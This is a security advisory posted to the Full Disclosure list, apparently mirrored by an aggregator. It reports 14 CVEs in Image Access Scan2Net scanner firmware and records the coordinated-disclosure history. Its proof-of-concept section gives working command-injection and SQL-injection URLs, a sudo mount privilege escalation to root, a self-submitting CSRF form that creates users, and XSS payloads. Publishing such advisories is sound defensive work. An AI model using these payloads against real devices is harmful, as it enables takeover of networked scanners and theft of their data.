SEC Consult SA-20241204-0 :: Multiple Critical Vulnerabilities in Image Access Scan2Net (14 CVE)
2024-12-5 12:26:50 Author: seclists.org(查看原文) 阅读量:4 收藏
2024-12-5 12:26:50 Author: seclists.org(查看原文) 阅读量:4 收藏
Full Disclosure mailing list archives
From: SEC Consult Vulnerability Lab via Fulldisclosure <fulldisclosure () seclists org>
Date: Wed, 4 Dec 2024 09:52:38 +0000
SEC Consult Vulnerability Lab Security Advisory < 20241204-0 >
=======================================================================
title: Multiple Critical Vulnerabilities
product: Image Access Scan2Net
vulnerable version: Firmware <=7.40, <=7.42, <7.42B
(depending on the vulnerability)
fixed version: mostly fixed in v7.42B
CVE number: CVE-2024-28138, CVE-2024-28139, CVE-2024-28140
CVE-2024-28141, CVE-2024-28142, CVE-2024-28143
CVE-2024-28144, CVE-2024-28145, CVE-2024-28146
CVE-2024-47946, CVE-2024-47947, CVE-2024-36498
CVE-2024-36494, CVE-2024-50584
impact: critical
vendor homepage: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en
advisory URL: https://r.sec-consult.com/imageaccess
found: 2023-06-22
by: Daniel Hirschberger (Office Bochum)
Tobias Niemann (Office Bochum)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Scan2Net® - The Ultimate Scanning Technology
- Better than just another client software package
- Integrates into existing networks without additional drivers or PCs
- Unrivaled performance, highest security, low connectivity cost
The Scan2Net® platform is the technological foundation of all WideTEK® and
Bookeye® scanners from Image Access. It replaces the proprietary scanner drivers
and software that traditional scanners require with the fastest common,
nonproprietary connection available: TCP/IP over Ethernet. With network
interface speeds much higher than USB or SCSI, Scan2Net devices are able to
reach unrivaled performance at very low connectivity cost. The Linux based
operating system is dedicated to scanner specific imaging and mechanical control
tasks, further maximizing scanning speeds and performance."
Source: https://www.imageaccess.de/?page=SoftwareScan2Net&lang=en
Business recommendation:
------------------------
The vendor provides a firmware update to version 7.42B which should be installed
immediately. SEC Consult could only partially verify the correction of all
identified vulnerabilities. Some vulnerabilities have not been fixed by the
vendor as the risk was accepted.
SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.
Vulnerability overview/description:
-----------------------------------
1) OS Command Injection (CVE-2024-28138)
An unauthenticated attacker with network access to the scanner can execute any
system command via the "msg_events.php" script as the www-data user.
2) Privilege Escalation (CVE-2024-28139)
The www-data user can elevate his privileges because sudo is configured to allow
the execution of the mount command as root without a password. Therefore, the
privileges can be escalated to the root user.
3) Violation of Least Privilege Principle (CVE-2024-28140)
The scanner boots into a kiosk mode by default and opens the Scan2Net interface
in a browser window. This browser is run with the permissions of the root user.
There are also several other applications running as root user, some of them are
self-developed ones but those could not be exploited at first glance.
4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
The web application is not protected against cross-site request forgery attacks.
Therefore, an attacker can trick users into performing actions on the
application when they visit an attacker-controlled website or click on a
malicious link.
5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947)
Due to missing input sanitization, an attacker can perform cross-site-scripting
attacks and run arbitrary Javascript in the browser of other users.
6) Insecure Password Change Function (CVE-2024-28143)
The password change function does not require the current password, which makes
the application vulnerable to account takeover, especially if combined with the
CSRF vulnerability.
7) Broken Access Control (CVE-2024-28144)
Due to missing access control on the reboot and shutdown functions, an attacker
can perform a denial-of-service attack against the application.
Furthermore, an attacker who can spoof the IP address and the User-Agent of a
logged-in user can takeover the session because of flaws in the self-developed
session management.
8) Unauthenticated SQL Injection (CVE-2024-28145)
An unauthenticated attacker can perform an SQL injection by accessing the
dbconnector.php file and supplying malicious GET parameters.
9) Hard-coded Credentials (CVE-2024-28146)
The application uses several hard-coded credentials for protecting the firmware
update file and the installed database server.
Update 2024-04-02:
------------------
ImageAccess GmbH provided us with an internet-facing test device and we spent
some short time verifying the vulnerabilities in their latest firmware (7.40)
which should fix the security issues according to the vendor.
Unfortunately, most of them are still present and new ones have been discovered.
In short:
1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
Fixed, but a new RCE vulnerability has been discovered which requires a session
as Poweruser, updated PoC below.
The second RCE issue is tracked as CVE-2024-47946.
2) Privilege Escalation (CVE-2024-28139)
Still an issue.
3) Violation of Least Privilege Principle (CVE-2024-28140)
Still an issue.
4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
Fixed. The introduced "session_id" cookie is protected with the "SameSite=Strict"
cookie flag. This prevents CSRF attacks.
5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498)
Original issues are fixed (CVE-2024-28142, CVE-2024-47947), but we discovered a
new one, updated PoC below. The new XSS is tracked as CVE-2024-36498.
6) Insecure Password Change Function (CVE-2024-28143)
Fixed. The password change function now requires the current password.
7) Broken Access Control (CVE-2024-28144)
Still an issue.
If two users access the web interface from the same IP they are logged in as the
other user. Updated PoC below.
8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
Original issue fixed, but a new blind SQLi as Poweruser has been found, updated
PoC below. The new SQLi is tracked as CVE-2024-50584.
9) Hard-coded Credentials (CVE-2024-28146)
Still an issue, credentials can be found in different files.
Update 2024-10-14:
------------------
ImageAccess GmbH provided us with an internet-facing test device and we spent
some short time verifying the vulnerabilities in their latest firmware (7.42)
which should fix the submitted critical security issues according to the vendor.
1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
The new RCE vulnerability is fixed now.
2) Privilege Escalation (CVE-2024-28139)
Still an open issue. The risk has been accepted by the vendor because the other
critical issues are fixed and shell access is not easily possible anymore.
3) Violation of Least Privilege Principle (CVE-2024-28140)
The kiosk browser is no longer running as root but many other custom services
still are.
4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
Fixed.
5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)
The third XSS (CVE-2024-36498) has also been fixed. We discovered a new XSS
vulnerability in the login page which only works if the target user is _not_
already logged in, which makes it ideal for login form phishing attempts.
The new XSS is tracked as CVE-2024-36494.
6) Insecure Password Change Function (CVE-2024-28143)
Fixed. The password change function now requires the current password.
7) Broken Access Control (CVE-2024-28144)
Still an issue.
8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
The blind SQLi as Poweruser has been fixed.
9) Hard-coded Credentials (CVE-2024-28146)
Mostly fixed. Many credentials can be found in different files. The most
problematic 'support' user had their password rotated and it was not immediately
obvious where it is stored now.
Proof of concept:
-----------------
1) OS Command Injection (CVE-2024-28138, CVE-2024-47946)
An unauthenticated attacker with network access can execute arbitrary commands
by visiting the following URL. The HTTP GET parameter "data" is not properly
sanitized:
https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;$COMMAND
For example, the following URL can be used to display information about the
current user of the web server:
https://$SCANNER/class/msg_events.php?action=writemsgfifo&data=;id
The following image shows the output of the command:
<01_os_command_injection.png>
Update 2024-04-02:
------------------
The second issue is now tracked as CVE-2024-47946.
The OS command injection as shown above is no longer possible in the new
firmware version 7.40. Another possibility to gain remote code execution
has been identified if the attacker has access to a valid Poweruser session.
Specifically crafted valid PNG files with injected PHP content can be uploaded
as desktop backgrounds or lock screens. After the upload, the PHP script is
available in the web root. The PHP script executes once the uploaded file is
accessed. This allows the execution of arbitrary PHP code and OS commands on
the device as "www-data".
<01_os_command_injection_new.png>
2) Privilege Escalation (CVE-2024-28139)
By executing the command "sudo -l" as the www-data user, it is apparent that
this user can be used to escalate privileges to root, as shown in the following
figure:
<02-sudo-L.png>
The following commands can be executed to elevate to root privileges, as shown
in the following figure:
> sudo mount -o bind /usr/bin/bash /usr/bin/mount
> sudo mount
<02-sudo_mount.png>
3) Violation of Least Privilege Principle (CVE-2024-28140)
Many processes are running with root privileges which violates the principle of
Least Privilege.
This can be confirmed by running "ps aux" as the root user and observing the
output:
root /opt/s2n/bin/S2NBrowserV7 --no-sandbox StartUpSelection.html x:0 y:800 w:1920 h:1080
root \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
root \_ /usr/lib/x86_64-linux-gnu/qt5/libexec/QtWebEngineProcess --type=zygote --no-sandbox --lang=en-US
[...]
Apart from the browser the following binaries are also run with root permissions:
vsftpd, smbd, wsdd.py, X11, OpenBox
s2n-specific Binaries (copyd, s2ncopy, ocrd, imaged, camd_ucc1, admind, s2nwdd,
ledd, wt36keyb, ...).
4) Cross-Site Request-Forgery (CSRF) (CVE-2024-28141)
The application offers no protection against Cross-Site Request-Forgery.
An attacker can therefore forge malicious links to reset the admin password or
create new users.
4.1) Reset Admin Password
The following link resets the password of the administrator to the value
"CSRF2YOU!". The password is base64-encoded (Q1NSRjJZT1Uh).
https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm
4.2) Register a new user
The following code can be hosted on a malicious page controlled by the attacker.
When a user who is logged in as administrator is lured by the attacker to visit
this page, a new user "SECtest" with the password "CSRF2YOU!" is automatically
created:
<html>
<body>
<form action="https://$SCANNER/cgi/upuserdata.cgi"; method="POST">
<input type="hidden" name="groupid" value="0" />
<input type="hidden" name="username" value="SECtest" />
<input type="hidden" name="pw1" value="CSRF2YOU!" />
<input type="hidden" name="pw2" value="CSRF2YOU!" />
<input type="submit" value="Submit request" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
The following image shows the result:
<04_register_user>.png
5) Stored Cross-Site-Scripting (XSS) (CVE-2024-28142, CVE-2024-47947, CVE-2024-36498, CVE-2024-36494)
There are at least two identified injection points:
5.1) Scenario 1: Stored XSS via User Settings -> File Name (CVE-2024-28142)
a. Login as Scan2Net User.
b. Navigate to User Settings -> File Name (https://$SCANNER/cgi/uset.cgi?-cfilename)
c. Edit the "Wildcard Character" %2 setting to contain the following payload and
reference it in the file name:
> <script>alert(document.location)</script>
<05-1_xss_scenario_1.png>
d. The JavaScript payload will be saved automatically.
e. The payload will be triggered on each visit of the User Settings -> File Name
page.
It is also executed when an admin visits the following page:
https://$SCANNER/cgi/uset.cgi?-cfilename
<05-2_xss_scenario_1_triggered.png>
This attack can even be performed without being logged in because the affected
functions are not fully protected. Without logging in, only the file name
parameter of the "Default" User can be changed. However, the wildcards can be
changed without authentication. To inject the payload, the following two
requests have to be submitted.
I. Changing the file name of the "Default" user to scan_xss%2.pdf:
https://$SCANNER/cgi/chopt.cgi?uset+save_filename+scan_xss%252.pdf+filename+Default
II. Changing the Wildcard %2 to the JavaScript payload:
https://$SCANNER/cgi/chopt.cgi?fileabb+fileabb_customvalue2+%3Cscript%3Ealert(document.location)%3C/script%3E
5.2) Scenario 2: Stored XSS via the ScanWizard Disclaimer (CVE-2024-47947)
The "Edit Disclaimer Text" function of the configuration menu is also vulnerable.
Only the users Poweruser and Admin can use this function which is available at
the URL
https://$SCANNER/cgi/admin.cgi?-rdisclaimer+-apre
The JavaScript can be inserted as shown in this image:
<05-3_xss_scenario_2_insertion.png>
Afterwards, this change has to be applied by clicking on the "Apply" button.
From now on the payload will be executed every time the ScanWizard is loaded.
The URL of the ScanWizard interface is: https://$SCANNER/ScanWizard.html
<05-4_xss_scenario_2_trigger_browser.png>
This also includes the ScanWizard which is displayed in the Kiosk-mode browser
which is present on the physical touch-enabled display of the scanner itself.
<05-4_xss_scenario_2_trigger_touch.png>
Update 2024-04-02:
------------------
The third issue is now tracked as CVE-2024-36498.
The following text can be inserted as Poweruser into the disclaimer to
exploit this issue:
%3c%53%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%53%63%72%69%70%74%3e
This is the payload <Script>alert(1)</Script> URL-encoded.
Update 2024-10-14:
------------------
The fourth issue is now tracked as CVE-2024-36494.
A new reflected XSS, which only works on unauthenticated targets, has been found:
https://$SCANNER/cgi/slogin.cgi?-tsetup+-uuser%22%20onfocus%3ddocument.body.innerHTML%2B%3dlocation.hash,document.body.innerHTML%2b%3ddocument.body.innerText%20autofocus%20b%3d#<img/src="x"onerror="alert(1)">
Update 2024-11-12:
------------------
The vendor tells us that the latest identified XSS issue should be fixed with
version 7.42B.
6) Insecure Password Change Function (CVE-2024-28143)
The password change function does not require the user to enter the old password
in order to set a new one. As explained in the CSRF finding (4.1),
an attacker can use this to forcefully set a new password for a user without
knowing the old password. The following link sets the password of the user, who
clicks on it, to the value "CSRF2YOU!" which is "1Q1NSRjJZT1Uh" when encoded
with base64.
https://$SCANNER/cgi/admin.cgi?-rsetpass+-aaction+-1Q1NSRjJZT1Uh+-2adm
7) Broken Access Control (CVE-2024-28144)
7.1) Reboot and Shutdown functions
The functions "reboot" and "shutdown" can be called without any authorization
checks nor any authentication:
https://$SCANNER/cgi/shutdown.cgi
https://$SCANNER/cgi/reboot.cgi
The authorization checks are also missing on the User Settings -> File Name and
the dbconnector as described in chapter 5.1 and 8 respectively.
7.2) Broken Session Management
Scan2Net implements a custom algorithm for the session management.
The algorithm is implemented the following way:
> SID1="$(/opt/s2n/bin/hide -s -e -i "$REMOTE_ADDR:$HTTP_USER_AGENT" -p $HOSTNAME)"
The result is stored in the database as the current session ID. On each access
request to Scan2Net the SID1 is calculated and compared to the stored session ID
in the database. This also means that only one user can be logged in at any
time. Furthermore, an attacker who is able to spoof the IP address of a victim
and knows the User Agent which was used to login, can take over the session of
the victim.
Update 2024-04-02:
------------------
The session management is still broken.
Start two browsers of your choice (this example will use Chrome and Firefox).
Browse to https://$SCANNER_IP/cgi/config.cgi in both browsers. Notice that
you are not logged in in both ones and your "login level" is "Default".
Login in Chrome as Poweruser. Refresh the page in Firefox and notice that your
login level now displays "Poweruser".
Browse to https://$SCANNER/cgi/slogin.cgi?-tsetup+-uPoweruser in Firefox
and click on "Edit Disclaimer Text". You will get the following error message:
<07-1_edit_disclaimer.png>
<07-2_authentication_error.png>
In Firefox browse to https://$SCANNER_IP/ScanWizard.html,
then https://$SCANNER_IP/cgi/setupmenu.cgi and click on "Edit Disclaimer Text"
once more. This time you can edit the disclaimer.
8) Unauthenticated SQL Injection (CVE-2024-28145, CVE-2024-50584)
An unauthenticated attacker can reach the database connector at the following URL:
https://$SCANNER/class/dbconnect.php
The connector accepts several query parameters:
> action, search, table, field, value
Of those, the parameters search, table, field, and value are vulnerable against
SQL injection. For example, one SQL injection can be performed on the parameter
"field" with the UNION keyword. The following request returns the version of the
used SQL database server by union selecting "@@version":
http://$SCANNER/class/dbconnect.php?action=getdbvalue&search=singlemode&table=user_touchscreen&field=configuration_name%20UNION%20ALL%20SELECT%20@@version--%20-&value=ScanWizard
The web server responds with:
> HTTP/1.1 200 OK
> […]
> 10.3.38-MariaDB-0+deb10u1
The database is accessed with the rights of the user "s2n".
Update 2024-04-02:
------------------
The second issue is now tracked as CVE-2024-50584.
The injection point shown above has been fixed in the new firmware (7.40),
but a new exploitable injection point was discovered in template_io.php.
An attacker with an active session as Poweruser can access the following URL:
https://$SCANNER/class/template_io.php
The PHP script processes the following query parameters:
> action, table, templates
The templates parameter is vulnerable against blind boolean-based SQL injection
attacks. SQL syntax must be injected into the JSON syntax of the templates
parameter. As a short proof of concept the following three requests can be sent:
https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default"}
https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1336--+A"}
https://$SCANNER/class/template_io.php?action=export&table=printer&templates={"0":"default'+AND+1337=1337--+A"}
For the 1st (no injection) and 3rd (true condition) request the server responds
with the identical ZIP file in the response:
> HTTP/1.1 200 OK
> […]
> Content-Length: 1699
> PK[…]
Only the response from the 2nd request (false condition) differs in length and
content. This indicates that the injected SQL is processed by the database:
> HTTP/1.1 200 OK
> […]
> Content-Length: 1268
> PK[…]
The vulnerability was successfully exploited to exfiltrate data from the
connected database. As before, the database is accessed with the db user "s2n".
9) Hard-coded Credentials (CVE-2024-28146)
After obtaining root access to the scanner, the system could be examined and
checked for hard-coded credentials. The found credentials are used to encrypt
config files during backup, decrypt the new firmware during an update and some
of the listed passwords allow a direct connection to the database server of the
scanner.
| File | Usage | Username | Password |
| ----------------------------------- | ----------------------------- | -------- | ------------- |
| /opt/s2n/www/cgi/infoio.cgi | Encryption of exported config | - | !Ba[REDACTED] |
| /opt/s2n/www/cgi/sysupd-1 | Encryption of firmware update | - | Gle[REDACTED] |
| /opt/s2n/www/cgi/sysupd-2 | Encryption of firmware update | - | Gli[REDACTED] |
| /opt/s2n/www/cgi/sysupd-3 | Encryption of firmware update | - | Bet[REDACTED] |
| /opt/s2n/www/cgi/sysupd-7 | Encryption of firmware update | - | 201[REDACTED] |
| /opt/s2n/www/class/LocaleImport.php | login for database | support | HDD[REDACTED] |
| /opt/s2n/www/class/DBmysqli.php | login for database | s2n | fsc[REDACTED] |
| /opt/s2n/www/class/dbconnect.php | login for database | mysql | MK2[REDACTED] |
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test in 2023:
* Firmware 7.31L on a WideTEK 36CL-600 Scanner
All previous versions of Scan2Net before 7.40 are affected, which are used in WideTEK
or Bookeye scanners.
SEC Consult was provided access to a patched scanner device by the vendor with
firmware 7.40 in March 2024. It was briefly verified whether the security issues
were properly fixed, but it was identified that most security issues are still
present in the latest version.
Furthermore, the most recent firmware version 7.42 was rechecked in October
2024. Most critical security issues have been fixed, but some issues are still
open.
Vendor contact timeline:
------------------------
2023-06-22: Penetration test at our customer is done, we offer to start the
responsible disclosure process with the vendor.
Customer wants to do the responsible disclosure process themselves.
2023-07-10: We ask if there is an update from the vendor;
Customer informs us that there is no update yet.
2023-07-10: Customer informs us that the vendor is cooperative and working on a
timeline for the remediation of the vulnerabilities.
2023-09-18: Because of an unrelated project we ask the customer if we should
start a responsible disclosure process for that other project;
Customer wants us to do the responsible disclosure process because
they are currently lacking the resources to do it themselves.
This also includes yet another, unrelated, older project;
We ask if we should also start a responsible disclosure process for
<this> project.
2023-09-22: Customer gives us permission for this project as well.
2023-11-28: Contacting vendor via support () imageaccess de; no response.
2023-12-18: Contacting vendor again via support () imageaccess de
2023-12-21: Support requests device name, serial number and firmware version.
2023-12-22: We provide the device name and firmware version, don't have serial
number; no response from vendor.
2024-01-17: Asking vendor again where to send the advisory, if encryption is
supported; no response.
2024-02-07: Submitting this case to German CERT-Bund/BSI via CVD including
advisory details.
2024-02-09: Response from CERT-Bund, trying to establish contact with vendor.
2024-02-19: Response from CERT-Bund, vendor provides version 7.40 which fixes
the issues.
2024-02-19: Asking whether the advisory was sent to the vendor by CERT-Bund,
trying to clarify how to verify the fix and which devices and
firmware versions are affected. Preparing CVE reservation.
2024-03-04: Vendor responds to CERT-Bund and keeps SEC Consult in CC.
Users can download the firmware themselves via the download page.
2024-03-05: Asking about affected devices (Scan2net WideTEK, Bookeye, etc).
Reserving CVE numbers and sending them to vendor.
2024-03-12: Detailed vendor response, providing internet-facing test device
to verify the latest firmware version 7.40.
2024-03-25: Briefly verifying latest firmware version, most security issues
still present. Updating security advisory.
2024-04-02: Sending updated advisory to vendor, asking for a meeting. No response.
2024-04-12: Asking whether email was received and to schedule a meeting.
2024-04-16: Productive conference call, further explained open security issues,
updated firmware version scheduled for mid May.
2024-05-23: Asking for a status update. No response.
2024-06-11: Asking for a status update again.
Vendor: New version should be available by end of the week.
2024-06-18: Vendor informs us that new version is available and should fix
all reported issues.
2024-09-26: Requesting access to test system again to verify fix (delay because
of longer vacation period)
2024-09-26: Quick vendor response, providing access to test system again.
2024-09-27: Apologizing for delay because of vacations/absences, recheck will be
performed soon.
2024-09-27: Vendor provides updated version information, latest version is
currently v7.42.
2024-10-14: Recheck of latest firmware version.
2024-10-15: Informing vendor about the open issues, providing current draft advisory.
Asking about next steps/accepted risks.
2024-10-28: Asking for a status update.
2024-11-11: Asking for a status update.
2024-11-12: Vendor tells us that 7.42B should fix the newest XSS.
We state that we no longer have capacities for further rechecks.
2024-11-29: Sending latest advisory draft to vendor, proposing release date for 2024-12-04;
Vendor accepts the publication date and mentions that they
want to release a bugfix for issue #7 this week.
2024-12-04: Public disclosure of security advisory.
Solution:
---------
The vendor provides a firmware update to version 7.42B which can be downloaded
via the vendor's customer server portal:
https://www.imageaccess.de/?page=SupportPortal&lang=en
This version fixes most of the identified issues. Only a few issues remain,
where the vendor has accepted the risk or is going to patch it in the future.
Workaround:
-----------
None
Advisory URL:
-------------
https://r.sec-consult.com/imageaccess
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Daniel Hirschberger, Tobias Niemann, Johannes Greil / @2024
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- SEC Consult SA-20241204-0 :: Multiple Critical Vulnerabilities in Image Access Scan2Net (14 CVE) SEC Consult Vulnerability Lab via Fulldisclosure (Dec 04)
文章来源: https://seclists.org/fulldisclosure/2024/Dec/2
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh